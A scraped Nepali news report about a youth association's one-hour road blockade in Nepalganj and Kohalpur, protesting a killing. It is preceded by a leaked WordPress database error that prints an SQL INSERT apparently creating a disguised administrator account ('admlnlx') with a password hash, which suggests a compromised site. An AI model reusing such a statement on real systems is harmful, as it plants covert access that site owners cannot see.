WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bq3GmoIm9sb6Lb.kMz0UqVVOgV0XQK.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 13:57:48', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस ५-
एमाले भातृसंगठन युवा संघ नेपाल रुपन्देहीका अध्यक्ष दुर्गा तिवारीको हत्याको बिरुद्ध युवासंघ नेपाल बाँकेले नेपालगन्ज र कोहलपुरमा बिरोध स्वरुप एक घण्टा चक्का जाम गरेको छ । युवा संघ बाँकेका अध्यक्ष किशोर थापाले दिएको जानकारी अनुसार घटनाको विरोध स्वरुप पहिलो चरणमा एकघण्टा चक्का जामको आयोजना गरिएको हो । युवासंघका कार्यकर्ताहरु कोहलपुरमा पूर्वपश्चिम राजमार्ग ठप्प पार्नुको साथै नेपालगन्जको पुष्पलाल चोकमा सवारी आवागमन वन्द गरेको थिए ।